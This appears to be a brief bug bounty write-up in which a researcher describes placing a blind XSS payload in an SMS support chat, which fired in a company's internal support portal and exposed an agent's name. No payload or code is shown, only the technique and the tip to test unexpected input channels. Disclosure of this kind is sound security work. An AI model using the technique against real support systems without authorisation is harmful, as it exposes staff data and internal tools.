avatarChevon Phillip

Summary

A security researcher successfully executed a blind XSS attack via an SMS support chat, leading to a $1100 bug bounty.

Abstract

In a recent security testing scenario, the author, a bug hunter, discovered a vulnerability in a company's support system that allowed for the execution of a blind XSS attack. The company, referred to as example.com, provided support through email, phone calls, and text messages. The researcher focused on the SMS support option and, after creating a ticket, injected a blind XSS payload into the SMS message. This resulted in the payload being triggered within an internal support portal, revealing sensitive information such as the first and last name of the support agent. The researcher shared a proof of concept image and emphasized the importance of testing for blind XSS in unexpected places, like support chats. The write-up concluded with an invitation for readers to follow the author on social media for more insights.

Opinions

  • The author believes in the importance of testing non-traditional input channels for XSS vulnerabilities.
  • The success of the attack demonstrates the author's skill in identifying and exploiting security weaknesses in communication systems.
  • The author suggests that security researchers should be thorough and creative in their approach to finding vulnerabilities.
  • The disclosure of the bug bounty amount indicates the author's view of such programs as a valuable incentive for ethical hacking efforts.
  • By sharing the experience, the author shows a commitment to contributing to the knowledge base of the cybersecurity community.

Blind XSS via SMS Support Chat — $1100 Bug Bounty!

Hello Hunters, This is a quick write-up on how my blind XSS payload executed within an internal support portal via an SMS support chat.

This company (example.com) had a support site allowing users to submit a support ticket. You can create a support ticket in three ways:

  1. Email Support
  2. Phone Call Support
  3. Text messages SMS support

Option 3 stood out to me, and I decided to play around with this option. After a few minutes of creating a ticket, I decided to make another ticket, but this time injecting my blind XSS payload within the SMS message, which turned into a live SMS text between the support agent and myself.

Long Story Short…My payload got triggered after our chat ended with an internal note which also leaked the first and last name of the support agent and more.

Here is a redirected version of the PoC:

PoC Image of Internal Portal

Takeaways:

Always try your blind XSS payloads in areas that are not likely to expect one, like a support SMS chat.

I hope you like this short write-up. If you want to see more, please follow me here and on Twitter. https://twitter.com/ChevonPhillip

Bug Bounty
Bug Bounty Tips
Bug Bounty Writeup
Recommended from ReadMedium
avatarAbhijeet kumawat
🚀Bypassed Cloudflare: XSS Pop-Up 🔥

⚡Introduction

4 min read
avataraimaster
Top 235 IDOR Bug Bounty Reports

What is IDOR?

4 min read
avatarRivuDon
How I got Bounty and Hall of Fame for finding easy bugs

How you can get yours too.

6 min read
avatarSantosh Kumar Sha(@killmongar1996)
Unveiling a Critical Vulnerability: Exposing AWS Credentials in a Penetration Test

Introduction

5 min read
avatarKhaled Ahmed
How I Found an ATO in a Public Program

3 min read
avatarSıla Özeren
How Loose Regex Can Earn You a Bounty for an Open Redirect Filter Bypass Bug

In this blog, discover how a tiny oversight in a regex can lead to a serious open redirect vulnerability — and a sweet bug bounty.

3 min read